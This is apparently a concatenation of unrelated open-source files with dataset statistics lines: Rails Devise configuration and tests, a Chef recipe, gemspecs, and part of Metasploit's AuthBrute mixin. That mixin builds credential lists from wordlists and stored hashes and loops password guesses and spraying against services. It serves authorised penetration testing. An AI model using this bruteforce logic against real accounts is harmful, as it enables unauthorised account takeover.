        order_promotion = Spree::OrderPromotion.where(order: order, promotion: promotion).first
        order_promotion.present? ? order_promotion.promotion_code : nil
      end
    end
  end
end
| 39.283019 | 174 | 0.695965 |
b9819bccffacc399cab91b4cab8cf283dcfadfd6 | 14,457 | # frozen_string_literal: true
# Use this hook to configure devise mailer, warden hooks and so forth.
# Many of these configuration options can be set straight in your model.
Devise.setup do |config|
# The secret key used by Devise. Devise uses this key to generate
# random tokens. Changing this key will render invalid all existing
# confirmation, reset password and unlock tokens in the database.
# Devise will use the `secret_key_base` as its `secret_key`
# by default. You can change it below and use your own secret key.
# config.secret_key = '49fce65f7e6858acae2a31fc93daee2043e8a9cb65b2a533ecbba0e620a8e50527c869435883e2b865e8eecb5e50e9afae3915efa18a4349e55d2ecb5cf72b22'
# ==> Controller configuration
# Configure the parent class to the devise controllers.
# config.parent_controller = 'DeviseController'
# ==> Mailer Configuration
# Configure the e-mail address which will be shown in Devise::Mailer,
# note that it will be overwritten if you use your own mailer class
# with default "from" parameter.
config.mailer_sender = '[email protected]'
# Configure the class responsible to send e-mails.
# config.mailer = 'Devise::Mailer'
# Configure the parent class responsible to send e-mails.
# config.parent_mailer = 'ActionMailer::Base'
# ==> ORM configuration
# Load and configure the ORM. Supports :active_record (default) and
# :mongoid (bson_ext recommended) by default. Other ORMs may be
# available as additional gems.
require 'devise/orm/active_record'
# ==> Configuration for any authentication mechanism
# Configure which keys are used when authenticating a user. The default is
# just :email. You can configure it to use [:username, :subdomain], so for
# authenticating a user, both parameters are required. Remember that those
# parameters are used only when authenticating and not when retrieving from
# session. If you need permissions, you should implement that in a before filter.
# You can also supply a hash where the value is a boolean determining whether
# or not authentication should be aborted when the value is not present.
# config.authentication_keys = [:email]
# Configure parameters from the request object used for authentication. Each entry
# given should be a request method and it will automatically be passed to the
# find_for_authentication method and considered in your model lookup. For instance,
# if you set :request_keys to [:subdomain], :subdomain will be used on authentication.
# The same considerations mentioned for authentication_keys also apply to request_keys.
# config.request_keys = []
# Configure which authentication keys should be case-insensitive.
# These keys will be downcased upon creating or modifying a user and when used
# to authenticate or find a user. Default is :email.
config.case_insensitive_keys = [:email]
# Configure which authentication keys should have whitespace stripped.
# These keys will have whitespace before and after removed upon creating or
# modifying a user and when used to authenticate or find a user. Default is :email.
config.strip_whitespace_keys = [:email]
# Tell if authentication through request.params is enabled. True by default.
# It can be set to an array that will enable params authentication only for the
# given strategies, for example, `config.params_authenticatable = [:database]` will
# enable it only for database (email + password) authentication.
# config.params_authenticatable = true
# Tell if authentication through HTTP Auth is enabled. False by default.
# It can be set to an array that will enable http authentication only for the
# given strategies, for example, `config.http_authenticatable = [:database]` will
# enable it only for database authentication. The supported strategies are:
# :database = Support basic authentication with authentication key + password
# config.http_authenticatable = false
# If 401 status code should be returned for AJAX requests. True by default.
# config.http_authenticatable_on_xhr = true
# The realm used in Http Basic Authentication. 'Application' by default.
# config.http_authentication_realm = 'Application'
# It will change confirmation, password recovery and other workflows
# to behave the same regardless if the e-mail provided was right or wrong.
# Does not affect registerable.
# config.paranoid = true
# By default Devise will store the user in session. You can skip storage for
# particular strategies by setting this option.
# Notice that if you are skipping storage for all authentication paths, you
# may want to disable generating routes to Devise's sessions controller by
# passing skip: :sessions to `devise_for` in your config/routes.rb
config.skip_session_storage = [:http_auth]
# By default, Devise cleans up the CSRF token on authentication to
# avoid CSRF token fixation attacks. This means that, when using AJAX
# requests for sign in and sign up, you need to get a new CSRF token
# from the server. You can disable this option at your own risk.
# config.clean_up_csrf_token_on_authentication = true
# When false, Devise will not attempt to reload routes on eager load.
# This can reduce the time taken to boot the app but if your application
# requires the Devise mappings to be loaded during boot time the application
# won't boot properly.
# config.reload_routes = true
# ==> Configuration for :database_authenticatable
# For bcrypt, this is the cost for hashing the password and defaults to 11. If
# using other algorithms, it sets how many times you want the password to be hashed.
#
# Limiting the stretches to just one in testing will increase the performance of
# your test suite dramatically. However, it is STRONGLY RECOMMENDED to not use
# a value less than 10 in other environments. Note that, for bcrypt (the default
# algorithm), the cost increases exponentially with the number of stretches (e.g.
# a value of 20 is already extremely slow: approx. 60 seconds for 1 calculation).
config.stretches = Rails.env.test? ? 1 : 11
# Set up a pepper to generate the hashed password.
# config.pepper = '6b4522f20ab27a7e8d1713a5eb61aa4277101dba0e8ba7c8c0a9093066e1aa840c7b1266e36003837c459de7084d47f6285e8f605b09efd5ba3b326067063766'
# Send a notification to the original email when the user's email is changed.
# config.send_email_changed_notification = false
# Send a notification email when the user's password is changed.
# config.send_password_change_notification = false
# ==> Configuration for :confirmable
# A period that the user is allowed to access the website even without
# confirming their account. For instance, if set to 2.days, the user will be
# able to access the website for two days without confirming their account,
# access will be blocked just in the third day.
# You can also set it to nil, which will allow the user to access the website
# without confirming their account.
# Default is 0.days, meaning the user cannot access the website without
# confirming their account.
# config.allow_unconfirmed_access_for = 2.days
# A period that the user is allowed to confirm their account before their
# token becomes invalid. For example, if set to 3.days, the user can confirm
# their account within 3 days after the mail was sent, but on the fourth day
# their account can't be confirmed with the token any more.
# Default is nil, meaning there is no restriction on how long a user can take
# before confirming their account.
# config.confirm_within = 3.days
# If true, requires any email changes to be confirmed (exactly the same way as
# initial account confirmation) to be applied. Requires additional unconfirmed_email
# db field (see migrations). Until confirmed, new email is stored in
# unconfirmed_email column, and copied to email column on successful confirmation.
config.reconfirmable = true
# Defines which key will be used when confirming an account
# config.confirmation_keys = [:email]
# ==> Configuration for :rememberable
# The time the user will be remembered without asking for credentials again.
# config.remember_for = 2.weeks
# Invalidates all the remember me tokens when the user signs out.
config.expire_all_remember_me_on_sign_out = true
# If true, extends the user's remember period when remembered via cookie.
# config.extend_remember_period = false
# Options to be passed to the created cookie. For instance, you can set
# secure: true in order to force SSL only cookies.
# config.rememberable_options = {}
# ==> Configuration for :validatable
# Range for password length.
config.password_length = 6..128
# Email regex used to validate email formats. It simply asserts that
# one (and only one) @ exists in the given string. This is mainly
# to give user feedback and not to assert the e-mail validity.
config.email_regexp = /\A[^@\s]+@[^@\s]+\z/
# ==> Configuration for :timeoutable
# The time you want to timeout the user session without activity. After this
# time the user will be asked for credentials again. Default is 30 minutes.
# config.timeout_in = 30.minutes
# ==> Configuration for :lockable
# Defines which strategy will be used to lock an account.
# :failed_attempts = Locks an account after a number of failed attempts to sign in.
# :none = No lock strategy. You should handle locking by yourself.
# config.lock_strategy = :failed_attempts
# Defines which key will be used when locking and unlocking an account
# config.unlock_keys = [:email]
# Defines which strategy will be used to unlock an account.
# :email = Sends an unlock link to the user email
# :time = Re-enables login after a certain amount of time (see :unlock_in below)
# :both = Enables both strategies
# :none = No unlock strategy. You should handle unlocking by yourself.
# config.unlock_strategy = :both
# Number of authentication tries before locking an account if lock_strategy
# is failed attempts.
# config.maximum_attempts = 20
# Time interval to unlock the account if :time is enabled as unlock_strategy.
# config.unlock_in = 1.hour
# Warn on the last attempt before the account is locked.
# config.last_attempt_warning = true
# ==> Configuration for :recoverable
#
# Defines which key will be used when recovering the password for an account
# config.reset_password_keys = [:email]
# Time interval you can reset your password with a reset password key.
# Don't put a too small interval or your users won't have the time to
# change their passwords.
config.reset_password_within = 6.hours
# When set to false, does not sign a user in automatically after their password is
# reset. Defaults to true, so a user is signed in automatically after a reset.
# config.sign_in_after_reset_password = true
# ==> Configuration for :encryptable
# Allow you to use another hashing or encryption algorithm besides bcrypt (default).
# You can use :sha1, :sha512 or algorithms from others authentication tools as
# :clearance_sha1, :authlogic_sha512 (then you should set stretches above to 20
# for default behavior) and :restful_authentication_sha1 (then you should set
# stretches to 10, and copy REST_AUTH_SITE_KEY to pepper).
#
# Require the `devise-encryptable` gem when using anything other than bcrypt
# config.encryptor = :sha512
# ==> Scopes configuration
# Turn scoped views on. Before rendering "sessions/new", it will first check for
# "users/sessions/new". It's turned off by default because it's slower if you
# are using only default views.
# config.scoped_views = false
# Configure the default scope given to Warden. By default it's the first
# devise role declared in your routes (usually :user).
# config.default_scope = :user
# Set this configuration to false if you want /users/sign_out to sign out
# only the current scope. By default, Devise signs out all scopes.
# config.sign_out_all_scopes = true
# ==> Navigation configuration
# Lists the formats that should be treated as navigational. Formats like
# :html, should redirect to the sign in page when the user does not have
# access, but formats like :xml or :json, should return 401.
#
# If you have any extra navigational formats, like :iphone or :mobile, you
# should add them to the navigational formats lists.
#
# The "*/*" below is required to match Internet Explorer requests.
# config.navigational_formats = ['*/*', :html]
# The default HTTP method used to sign out a resource. Default is :delete.
config.sign_out_via = :delete
# ==> OmniAuth
# Add a new OmniAuth provider. Check the wiki for more information on setting
# up on your models and hooks.
# config.omniauth :github, 'APP_ID', 'APP_SECRET', scope: 'user,public_repo'
# ==> Warden configuration
# If you want to use other strategies, that are not supported by Devise, or
# change the failure app, you can configure them inside the config.warden block.
#
# config.warden do |manager|
# manager.intercept_401 = false
# manager.default_strategies(scope: :user).unshift :some_external_strategy
# end
# ==> Mountable engine configurations
# When using Devise inside an engine, let's call it `MyEngine`, and this engine
# is mountable, there are some extra configurations to be taken into account.
# The following options are available, assuming the engine is mounted as:
#
# mount MyEngine, at: '/my_engine'
#
# The router that invoked `devise_for`, in the example above, would be:
# config.router_name = :my_engine
#
# When using OmniAuth, Devise cannot automatically set OmniAuth path,
# so you need to do it manually. For the users scope, it would be:
# config.omniauth_path_prefix = '/my_engine/users/auth'
# ==> Turbolinks configuration
# If your app is using Turbolinks, Turbolinks::Controller needs to be included to make redirection work correctly:
#
# ActiveSupport.on_load(:devise_failure_app) do
# include Turbolinks::Controller
# end
# ==> Configuration for :registerable
# When set to false, does not sign a user in automatically after their password is
# changed. Defaults to true, so a user is signed in automatically after changing a password.
# config.sign_in_after_change_password = true
end
| 48.19 | 154 | 0.751262 |
33b165b2f8140b9686f84bca80f073205f24dc14 | 1,796 | require 'test_helper'
class UserTest < ActiveSupport::TestCase
  # Every example starts from this valid baseline user and perturbs
  # exactly one attribute.
  def setup
    @user = User.new(
      name: "Teresia Muiruri",
      email: "[email protected]",
      password: "foobar",
      password_confirmation: "foobar"
    )
  end

  test "should be valid" do
    assert @user.valid?
  end

  test "name should be present" do
    @user.name = " "
    assert_not @user.valid?
  end

  test "name should not be too long" do
    @user.name = "a" * 51
    assert_not @user.valid?
  end

  test "email should not be too long" do
    @user.email = "a" * 244 + "@example.com"
    assert_not @user.valid?
  end

  test "email validation should accept valid addresses" do
    valid_addresses = %w[[email protected] [email protected] [email protected]
                         [email protected] [email protected]]
    valid_addresses.each do |valid_address|
      @user.email = valid_address
      assert @user.valid?, "#{valid_address.inspect} should be valid"
    end
  end

  test "email validation should reject invalid addresses" do
    invalid_addresses = %w[user@example,com user_at_foo.org user.name@example.
                           foo@bar_baz.com foo@bar+baz.com]
    invalid_addresses.each do |invalid_address|
      @user.email = invalid_address
      assert_not @user.valid?, "#{invalid_address.inspect} should be invalid"
    end
  end

  test "email addresses should be unique" do
    duplicate_user = @user.dup
    @user.save
    assert_not duplicate_user.valid?
  end

  test "password should be present (nonblank)" do
    @user.password = @user.password_confirmation = " " * 6
    assert_not @user.valid?
  end

  test "password should have a minimum length" do
    @user.password = @user.password_confirmation = "a" * 5
    assert_not @user.valid?
  end
end
| 30.440678 | 124 | 0.668708 |
1cb085049080d0ff2f1e7849c95457f2dd6b9b58 | 1,251 | require 'commands'
# Holds positional [dx, dy] offsets for the cardinal directions.
module Direction
  # Offsets are frozen so callers cannot mutate the shared constants.
  NORTH = [0, -1].freeze
  SOUTH = [0, 1].freeze
  EAST  = [1, 0].freeze
  WEST  = [-1, 0].freeze
  STILL = [0, 0].freeze

  # Returns all contained items in each cardinal
  # :return: An array of cardinals (NORTH, SOUTH, EAST, WEST)
  def self.all_cardinals
    [NORTH, SOUTH, EAST, WEST]
  end

  # Converts from this direction tuple notation to the engine's string notation.
  # Commands is resolved lazily at call time, so this file still loads if
  # 'commands' has not been required yet.
  # :param direction: the direction in this notation
  # :return: The character equivalent for the game engine
  # :raise IndexError: when the value is not a known direction
  def self.convert(direction)
    case direction
    when NORTH then Commands::NORTH
    when SOUTH then Commands::SOUTH
    when EAST  then Commands::EAST
    when WEST  then Commands::WEST
    when STILL then Commands::STAY_STILL
    else raise IndexError
    end
  end

  # Returns the opposite cardinal direction given a direction
  # (STILL maps to itself).
  # :param direction: The input direction
  # :return: The opposite direction
  # :raise IndexError: when the value is not a known direction
  def self.invert(direction)
    case direction
    when NORTH then SOUTH
    when SOUTH then NORTH
    when EAST  then WEST
    when WEST  then EAST
    when STILL then STILL
    else raise IndexError
    end
  end
end
| 21.568966 | 79 | 0.670663 |
6a9e42a2b1ea9b99fbe8a4d2e829262943a842a7 | 1,534 | Pod::Spec.new do |s|
# NOTE(review): the hash/size columns fused onto the line above are artifacts
# of the dataset extraction, not part of the original podspec.
# --- Pod identity ---
s.name = "SGLog"
s.version = "0.0.4"
s.summary = "ObjectiveC logging macros"
s.description = <<-DESC
SGLog is a macro based logger which allows you to embed significant logging code in your
projects. You can categorize your log messages and write them out conditionally. Finally when
you are ready to ship, all of your logging messages are compiled out of your archive protecting
your proprietary info and preventing your app from spamming the iOS console.
DESC
s.homepage = "https://github.com/danloughney/SGLog"
s.license = { :type => "MIT", :file => "LICENSE" }
s.author = { "Daniel Loughney" => "[email protected]" }
s.social_media_url = 'http://twitter.com/dcloughney'
# --- Platform support (watchOS/tvOS targets left disabled) ---
s.platform = :ios
s.ios.deployment_target = '8.0'
# s.watchos.deployment_target = "2.0"
# s.tvos.deployment_target = "9.0"
# --- Sources: headers and implementation under SGLog/, all public ---
s.source = { :git => "https://github.com/danloughney/SGLog.git", :tag => "0.0.4" }
s.source_files = "Classes", "SGLog/*.{h,m}"
s.public_header_files = "SGLog/*.h"
s.framework = "UIKit"
s.requires_arc = true
# s.exclude_files = "Classes/Exclude"
# s.xcconfig = { "HEADER_SEARCH_PATHS" => "$(SDKROOT)/usr/include/libxml2" }
# s.dependency "JSONKit", "~> 1.4"
end
| 51.133333 | 105 | 0.552151 |
e8c8205946c0d87f05bb03a1396338c56e9a55da | 1,728 | # Cookbook Name:: varnish
# Recipe:: default
# Author:: Joe Williams <[email protected]>
# Contributor:: Patrick Connolly <[email protected]>
#
# Copyright 2008-2009, Joe Williams
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Optionally configure the distribution's Varnish package repository first.
include_recipe 'varnish::repo' if node['varnish']['use_default_repo']

package 'varnish'

# Render the VCL configuration, but only when this cookbook is expected to
# generate it (vcl_generated == true). A reload is enough to pick up VCL.
template "#{node['varnish']['dir']}/#{node['varnish']['vcl_conf']}" do
  source node['varnish']['vcl_source']
  cookbook node['varnish']['vcl_cookbook']
  owner 'root'
  group 'root'
  mode 0644
  notifies :reload, 'service[varnish]', :delayed
  only_if { node['varnish']['vcl_generated'] == true }
end

# Render the service defaults file; changing daemon options needs a restart.
template node['varnish']['default'] do
  source node['varnish']['conf_source']
  cookbook node['varnish']['conf_cookbook']
  owner 'root'
  group 'root'
  mode 0644
  # Use a symbol action (:restart) for consistency with :reload above;
  # the original passed the string 'restart'.
  notifies :restart, 'service[varnish]', :delayed
end

service 'varnish' do
  supports restart: true, reload: true
  action %w(enable)
end

# The logging daemons are toggled by node attributes.
service 'varnishlog' do
  supports restart: true, reload: true
  action node['varnish']['log_daemon'] ? %w(enable start) : %w(disable stop)
end

service 'varnishncsa' do
  supports restart: true, reload: true
  action node['varnish']['ncsa_daemon'] ? %w(enable start) : %w(disable stop)
end
| 29.793103 | 77 | 0.720486 |
d5fdb642a88578722f8b1ed4cf8bf8a0fda23d34 | 1,780 | # -*- ruby -*-
# encoding: utf-8
require File.expand_path("lib/google/area120/tables/v1alpha1/version", __dir__)
# Gem specification for the generated Area 120 Tables V1alpha1 client.
Gem::Specification.new do |spec|
  spec.name          = "google-area120-tables-v1alpha1"
  spec.version       = Google::Area120::Tables::V1alpha1::VERSION

  spec.authors       = ["Google LLC"]
  spec.email         = "[email protected]"
  spec.description   = "Using the Area 120 Tables API, you can query for tables, and update/create/delete rows within tables programmatically. Note that google-area120-tables-v1alpha1 is a version-specific client library. For most uses, we recommend installing the main client library google-area120-tables instead. See the readme for more details."
  spec.summary       = "API Client library for the Area 120 Tables V1alpha1 API"
  spec.homepage      = "https://github.com/googleapis/google-cloud-ruby"
  spec.license       = "Apache-2.0"

  spec.platform      = Gem::Platform::RUBY

  # Ship everything under lib/ and proto_docs/ plus the top-level docs.
  spec.files         = `git ls-files -- lib/*`.split("\n") +
                       `git ls-files -- proto_docs/*`.split("\n") +
                       ["README.md", "LICENSE.md", "AUTHENTICATION.md", ".yardopts"]
  spec.require_paths = ["lib"]

  spec.required_ruby_version = ">= 2.5"

  spec.add_dependency "gapic-common", ">= 0.5", "< 2.a"
  spec.add_dependency "google-cloud-errors", "~> 1.0"

  spec.add_development_dependency "google-style", "~> 1.25.1"
  spec.add_development_dependency "minitest", "~> 5.14"
  spec.add_development_dependency "minitest-focus", "~> 1.1"
  spec.add_development_dependency "minitest-rg", "~> 5.2"
  spec.add_development_dependency "rake", ">= 12.0"
  spec.add_development_dependency "redcarpet", "~> 3.0"
  spec.add_development_dependency "simplecov", "~> 0.18"
  spec.add_development_dependency "yard", "~> 0.9"
end
| 46.842105 | 348 | 0.674157 |
e82f91f08767d45602ae5790b909c897ece6c622 | 25,837 | # -*- coding: binary -*-
module Msf
###
#
# This module provides methods for brute forcing authentication
#
###
module Auxiliary::AuthBrute
# Registers the datastore options shared by all bruteforce modules:
# single credentials (USERNAME/PASSWORD), wordlist files, DB-backed
# credential toggles (DB_ALL_*), pacing (BRUTEFORCE_SPEED), and advanced
# per-service / per-user guess and time limits.
def initialize(info = {})
  super

  register_options([
    OptString.new('USERNAME', [ false, 'A specific username to authenticate as' ]),
    OptString.new('PASSWORD', [ false, 'A specific password to authenticate with' ]),
    OptPath.new('USER_FILE', [ false, "File containing usernames, one per line" ]),
    OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line" ]),
    OptPath.new('USERPASS_FILE', [ false, "File containing users and passwords separated by space, one pair per line" ]),
    OptInt.new('BRUTEFORCE_SPEED', [ true, "How fast to bruteforce, from 0 to 5", 5]),
    OptBool.new('VERBOSE', [ true, "Whether to print output for all attempts", true]),
    OptBool.new('BLANK_PASSWORDS', [ false, "Try blank passwords for all users", false]),
    OptBool.new('USER_AS_PASS', [ false, "Try the username as the password for all users", false]),
    OptBool.new('DB_ALL_CREDS', [false,"Try each user/password couple stored in the current database",false]),
    OptBool.new('DB_ALL_USERS', [false,"Add all users in the current database to the list",false]),
    OptBool.new('DB_ALL_PASS', [false,"Add all passwords in the current database to the list",false]),
    OptBool.new('STOP_ON_SUCCESS', [ true, "Stop guessing when a credential works for a host", false]),
  ], Auxiliary::AuthBrute)

  register_advanced_options([
    OptBool.new('REMOVE_USER_FILE', [ true, "Automatically delete the USER_FILE on module completion", false]),
    OptBool.new('REMOVE_PASS_FILE', [ true, "Automatically delete the PASS_FILE on module completion", false]),
    OptBool.new('REMOVE_USERPASS_FILE', [ true, "Automatically delete the USERPASS_FILE on module completion", false]),
    OptBool.new('PASSWORD_SPRAY', [true, "Reverse the credential pairing order. For each password, attempt every possible user.", false]),
    OptInt.new('TRANSITION_DELAY', [false, "Amount of time (in minutes) to delay before transitioning to the next user in the array (or password when PASSWORD_SPRAY=true)", 0]),
    OptInt.new('MaxGuessesPerService', [ false, "Maximum number of credentials to try per service instance. If set to zero or a non-number, this option will not be used.", 0]), # Tracked in @@guesses_per_service
    OptInt.new('MaxMinutesPerService', [ false, "Maximum time in minutes to bruteforce the service instance. If set to zero or a non-number, this option will not be used.", 0]), # Tracked in @@brute_start_time
    OptInt.new('MaxGuessesPerUser', [ false, %q{
      Maximum guesses for a particular username for the service instance.
      Note that users are considered unique among different services, so a
      user at 10.1.1.1:22 is different from one at 10.2.2.2:22, and both will
      be tried up to the MaxGuessesPerUser limit. If set to zero or a non-number,
      this option will not be used.}.gsub(/[\t\r\n\s]+/nm,"\s"), 0]) # Tracked in @@brute_start_time
  ], Auxiliary::AuthBrute)
end
# Resets the per-service guess cap. @@max_per_service is a class variable
# because the bruteforce counters are shared across concurrently running
# module instances (see #initialize_class_variables / #counters_expired?).
def setup
  @@max_per_service = nil
end
# Yields each Metasploit::Credential::Core in the Mdm::Workspace whose
# private credential is an NTLM hash.
#
# @yieldparam [Metasploit::Credential::Core]
def each_ntlm_cred
  scope = Metasploit::Credential::Core.joins(:private).where(
    metasploit_credential_privates: { type: 'Metasploit::Credential::NTLMHash' },
    workspace_id: myworkspace.id
  )
  scope.each { |core| yield core }
end
# Yields each Metasploit::Credential::Core in the Mdm::Workspace whose
# private credential is a plaintext password.
#
# @yieldparam [Metasploit::Credential::Core]
def each_password_cred
  scope = Metasploit::Credential::Core.joins(:private).where(
    metasploit_credential_privates: { type: 'Metasploit::Credential::Password' },
    workspace_id: myworkspace.id
  )
  scope.each { |core| yield core }
end
# Yields each Metasploit::Credential::Core in the Mdm::Workspace whose
# private credential is an SSH key.
#
# @yieldparam [Metasploit::Credential::Core]
def each_ssh_cred
  scope = Metasploit::Credential::Core.joins(:private).where(
    metasploit_credential_privates: { type: 'Metasploit::Credential::SSHKey' },
    workspace_id: myworkspace.id
  )
  scope.each { |core| yield core }
end
# Checks whether we should be adding creds from the DB to a CredCollection.
#
# @return [TrueClass] if any of the DB_ALL_* datastore options are selected
#   and the database is active
# @return [FalseClass] otherwise
def prepend_db_creds?
  wants_db_creds = datastore['DB_ALL_CREDS'] || datastore['DB_ALL_PASS'] || datastore['DB_ALL_USERS']
  wants_db_creds && framework.db.active
end
# Prepends existing NTLM hashes from the database to the given credential
# collection, honoring the DB_ALL_* datastore options.
#
# @param cred_collection [Metasploit::Framework::CredentialCollection]
#   the credential collection to add to
# @return [Metasploit::Framework::CredentialCollection] the modified collection
def prepend_db_hashes(cred_collection)
  return cred_collection unless prepend_db_creds?
  each_ntlm_cred do |cred|
    process_cred_for_collection(cred_collection, cred)
  end
  cred_collection
end
# Prepends existing SSH keys from the database to the given credential
# collection, honoring the DB_ALL_* datastore options.
#
# @param cred_collection [Metasploit::Framework::CredentialCollection]
#   the credential collection to add to
# @return [Metasploit::Framework::CredentialCollection] the modified collection
def prepend_db_keys(cred_collection)
  return cred_collection unless prepend_db_creds?
  each_ssh_cred do |cred|
    process_cred_for_collection(cred_collection, cred)
  end
  cred_collection
end
# Prepends existing password credentials from the database to the given
# credential collection, honoring the DB_ALL_* datastore options.
#
# @param cred_collection [Metasploit::Framework::CredentialCollection]
#   the credential collection to add to
# @return [Metasploit::Framework::CredentialCollection] the modified collection
def prepend_db_passwords(cred_collection)
  return cred_collection unless prepend_db_creds?
  each_password_cred do |cred|
    process_cred_for_collection(cred_collection, cred)
  end
  cred_collection
end
# Converts a Metasploit::Credential::Core into a
# Metasploit::Framework::Credential and feeds it (or its public/private
# halves) into the collection according to the DB_ALL_* datastore options.
#
# @param cred_collection [Metasploit::Framework::CredentialCollection] the collection to add to
# @param cred [Metasploit::Credential::Core] the credential to process
def process_cred_for_collection(cred_collection, cred)
  converted = cred.to_credential
  if datastore['DB_ALL_CREDS']
    cred_collection.prepend_cred(converted)
  end
  cred_collection.add_private(converted.private) if datastore['DB_ALL_PASS']
  cred_collection.add_public(converted.public) if datastore['DB_ALL_USERS']
end
# Checks all three files for usernames and passwords, and combines them into
# one credential list to apply against the supplied block. The block (usually
# something like do_login(user,pass) ) is responsible for actually recording
# success and failure in its own way; each_user_pass() will only respond to
# a return value of :done (which will signal to end all processing) and
# to :next_user (which will cause that username to be skipped for subsequent
# password guesses). Other return values won't affect the processing of the
# list.
#
# The 'noconn' argument should be set to true if each_user_pass is merely
# iterating over the usernames and passwords and should not respect
# bruteforce_speed as a delaying factor.
def each_user_pass(noconn=false,&block)
  this_service = [datastore['RHOST'],datastore['RPORT']].join(":")
  # Sentinel key meaning "skip everything remaining for this service".
  fq_rest = [this_service,"all remaining users"].join(":")

  # This should kinda halfway be in setup, halfway in run... need to
  # revisit this.
  # One-time lazy init: `credentials ||= false` assigns false on the first
  # call, so the unless body runs exactly once per invocation of this method.
  unless credentials ||= false # Assignment and comparison!
    credentials ||= build_credentials_array()
    credentials = adjust_credentials_by_max_user(credentials)
    this_service = [datastore['RHOST'],datastore['RPORT']].join(":")
    initialize_class_variables(this_service,credentials)
  end

  prev_iterator = nil
  credentials.each do |u, p|
    # Explicitly be able to set a blank (zero-byte) username by setting the
    # username to <BLANK>. It's up to the caller to handle this if it's not
    # allowed or if there's any special handling needed (such as smb_login).
    u = "" if u =~ /^<BLANK>$/i
    break if @@credentials_skipped[fq_rest]
    fq_user = [this_service,u].join(":")

    # Set noconn to indicate that in this case, each_user_pass
    # is not actually kicking off a connection, so the
    # bruteforce_speed datastore should be ignored.
    if not noconn
      userpass_sleep_interval unless @@credentials_tried.empty?
    end

    next if @@credentials_skipped[fq_user]
    next if @@credentials_tried[fq_user] == p

    # Used for tracking if we should TRANSITION_DELAY
    # If the current user/password values don't match the previous iteration we know
    # we've made it through all of the records for that iteration and should start the delay.
    if ![u,p].include?(prev_iterator)
      unless prev_iterator.nil? # Prevents a delay on the first run through
        if datastore['TRANSITION_DELAY'] > 0
          vprint_status("Delaying #{datastore['TRANSITION_DELAY']} minutes before attempting next iteration.")
          sleep datastore['TRANSITION_DELAY'] * 60
        end
      end
      prev_iterator = datastore['PASSWORD_SPRAY'] ? p : u # Update the iterator
    end

    ret = block.call(u, p)

    # NOTE(review): the header comment mentions a :done return value, but no
    # branch below handles it -- confirm whether :abort superseded it.
    case ret
    when :abort # Skip the current host entirely.
      abort_msg = {
        :level => :error,
        :ip => datastore['RHOST'],
        :port => datastore['RPORT'],
        :msg => "Bruteforce cancelled against this service."
      }
      unless datastore['VERBOSE']
        abort_msg[:msg] << " Enable verbose output for service-specific details."
      end
      print_brute abort_msg
      break

    when :next_user # This means success for that user.
      @@credentials_skipped[fq_user] = p
      if datastore['STOP_ON_SUCCESS'] # See?
        @@credentials_skipped[fq_rest] = true
      end

    when :skip_user # Skip the user in non-success cases.
      @@credentials_skipped[fq_user] = p

    when :connection_error # Report an error, skip this cred, but don't neccisarily abort.
      print_brute(
        :level => :verror,
        :ip => datastore['RHOST'],
        :port => datastore['RPORT'],
        :msg => "Connection error, skipping '#{u}':'#{p}'")
    end

    # Record the attempt and stop if the guess/time budgets are exhausted.
    @@guesses_per_service[this_service] ||= 1
    @@credentials_tried[fq_user] = p

    if counters_expired? this_service,credentials
      break
    else
      @@guesses_per_service[this_service] += 1
    end
  end
end
# Returns true when this service instance has exhausted either its guess
# budget (MaxGuessesPerService) or its time budget (MaxMinutesPerService).
# Reads the shared class-variable counters populated by
# #initialize_class_variables and incremented by #each_user_pass.
def counters_expired?(this_service,credentials)
  expired_cred = false
  expired_time = false
  # Workaround for cases where multiple auth_brute modules are running concurrently and
  # someone stomps on the @max_per_service class variable during setup.
  current_max_per_service = self.class.class_variable_get("@@max_per_service") rescue nil
  return false unless current_max_per_service
  # Note: the cap only expires the run when it is lower than the full list --
  # reaching the end of the whole list is not reported as "hit maximum".
  if @@guesses_per_service[this_service] >= (@@max_per_service)
    if @@max_per_service < credentials.size
      print_brute(
        :level => :vstatus,
        :ip => datastore['RHOST'],
        :port => datastore['RPORT'],
        :msg => "Hit maximum guesses for this service (#{@@max_per_service}).")
      expired_cred = true
    end
  end
  seconds_to_run = datastore['MaxMinutesPerService'].to_i.abs * 60
  if seconds_to_run > 0
    if Time.now.utc.to_i > @@brute_start_time.to_i + seconds_to_run
      print_brute(
        :level => :vstatus,
        :ip => datastore['RHOST'],
        :port => datastore['RPORT'],
        :msg => "Hit timeout for this service at #{seconds_to_run / 60}m.")
      expired_time = true
    end
  end
  expired_cred || expired_time
end
# If the user passed a memory location for credential gen, assume
# that that's precisely what's desired -- no other transforms or
# additions or uniqueness should be done. Otherwise, perform
# the usual alterations.
#
# Returns an array of [user, pass] pairs built from USERPASS_FILE,
# USER_FILE/PASS_FILE, USERNAME/PASSWORD, and (optionally) the database.
def build_credentials_array
  credentials = extract_word_pair(datastore['USERPASS_FILE'])
  translate_proto_datastores()
  return credentials if datastore['USERPASS_FILE'] =~ /^memory:/
  users = load_user_vars(credentials)
  passwords = load_password_vars(credentials)
  cleanup_files()
  # Optional expansions: user-as-password and blank-password attempts.
  if datastore['USER_AS_PASS']
    credentials = gen_user_as_password(users, credentials)
  end
  if datastore['BLANK_PASSWORDS']
    credentials = gen_blank_passwords(users, credentials)
  end
  # Pull extra pairs, users, and passwords from the workspace DB as requested.
  if framework.db.active
    if datastore['DB_ALL_CREDS']
      myworkspace.creds.each do |o|
        credentials << [o.user, o.pass] if o.ptype =~ /password/
      end
    end
    if datastore['DB_ALL_USERS']
      myworkspace.creds.each do |o|
        users << o.user
      end
    end
    if datastore['DB_ALL_PASS']
      myworkspace.creds.each do |o|
        passwords << o.pass if o.ptype =~ /password/
      end
    end
  end
  credentials.concat(combine_users_and_passwords(users, passwords))
  credentials.uniq!
  # @strip_passwords / @strip_usernames collapse pairs to one half each.
  credentials = just_uniq_users(credentials) if @strip_passwords
  credentials = just_uniq_passwords(credentials) if @strip_usernames
  return credentials
end
# Class variables to track credential use. They need
# to be class variables due to threading.
#
# Resets the shared skip/tried maps and derives @@max_per_service from
# MaxGuessesPerService (clamped to the credential list size).
def initialize_class_variables(this_service,credentials)
  @@guesses_per_service ||= {}
  @@guesses_per_service[this_service] = nil
